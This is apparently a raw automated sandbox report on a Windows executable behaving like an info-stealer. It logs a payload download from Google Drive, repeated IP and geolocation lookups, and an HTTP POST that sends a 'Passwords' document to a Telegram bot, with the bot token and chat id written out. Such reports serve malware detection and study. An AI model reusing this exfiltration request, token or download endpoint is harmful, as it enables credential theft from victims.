            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49712 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1jNXENZ8HhH2flLMcD7n_1A0wmK9-bvgf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1jNXENZ8HhH2flLMcD7n_1A0wmK9-bvgf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318b05b80552Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034F16000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000035038000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034F16000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000035038000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D2F000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D24000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034F16000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000035038000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D2F000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2722332794.0000000004798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: 4UQ5wnI389.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034F16000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000035038000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934
            Source: 4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: 4UQ5wnI389.exe, 00000005.00000002.2722332794.00000000046D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: 4UQ5wnI389.exe, 00000005.00000002.2722769300.00000000061C0000.00000004.00001000.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2722332794.0000000004712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1jNXENZ8HhH2flLMcD7n_1A0wmK9-bvgf
            Source: 4UQ5wnI389.exe, 00000005.00000002.2722332794.00000000046D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/w
            Source: 4UQ5wnI389.exe, 00000005.00000003.2059854655.0000000004745000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000003.2059745395.000000000473F000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000003.2031235862.0000000004748000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2722332794.000000000473E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: 4UQ5wnI389.exe, 00000005.00000003.2059854655.0000000004745000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000003.2059745395.000000000473F000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000003.2031235862.0000000004748000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2722332794.000000000473E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/7
            Source: 4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2722332794.000000000472F000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2722332794.0000000004712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1jNXENZ8HhH2flLMcD7n_1A0wmK9-bvgf&export=download
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: 4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: 4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: 4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: 4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: 4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: 4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: 4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: 4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49724 version: TLS 1.2
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_70141B5F0_2_70141B5F
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_00404DCC5_2_00404DCC
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_00406AF25_2_00406AF2
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_001543285_2_00154328
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_00158DA05_2_00158DA0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_001559685_2_00155968
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_00155F905_2_00155F90
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_00152DD15_2_00152DD1
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A676285_2_37A67628
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6C6385_2_37A6C638
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6CCA05_2_37A6CCA0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A603AF5_2_37A603AF
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6331A5_2_37A6331A
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6581B5_2_37A6581B
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6E7905_2_37A6E790
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6DEE15_2_37A6DEE1
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6BD885_2_37A6BD88
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6CC915_2_37A6CC91
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6B4EC5_2_37A6B4EC
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6EBF75_2_37A6EBF7
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6E3395_2_37A6E339
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6DA895_2_37A6DA89
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6C1F25_2_37A6C1F2
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6B9445_2_37A6B944
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6B07F5_2_37A6B07F
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6F0425_2_37A6F042
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A678485_2_37A67848
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B196C85_2_37B196C8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B186505_2_37B18650
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B1BDF05_2_37B1BDF0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B19D105_2_37B19D10
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B114005_2_37B11400
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B1A3605_2_37B1A360
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B1BA975_2_37B1BA97
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B1A9B05_2_37B1A9B0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B167B05_2_37B167B0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B10FA85_2_37B10FA8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B1AFF75_2_37B1AFF7
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B1AFF85_2_37B1AFF8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B167C05_2_37B167C0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B15F105_2_37B15F10
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B15F015_2_37B15F01
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B13F705_2_37B13F70
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B13F605_2_37B13F60
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B136B05_2_37B136B0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B196B85_2_37B196B8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B136C05_2_37B136C0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B12E105_2_37B12E10
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B156605_2_37B15660
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B156505_2_37B15650
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B186405_2_37B18640
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B14DB05_2_37B14DB0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B14DA05_2_37B14DA0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B19D005_2_37B19D00
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B125605_2_37B12560
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B125505_2_37B12550
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B11CB05_2_37B11CB0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B174B85_2_37B174B8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B11CA05_2_37B11CA0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B174C85_2_37B174C8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B16C185_2_37B16C18
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B16C095_2_37B16C09
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B143B95_2_37B143B9
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B113F05_2_37B113F0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B143C85_2_37B143C8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37B13B185_2_37B13B18
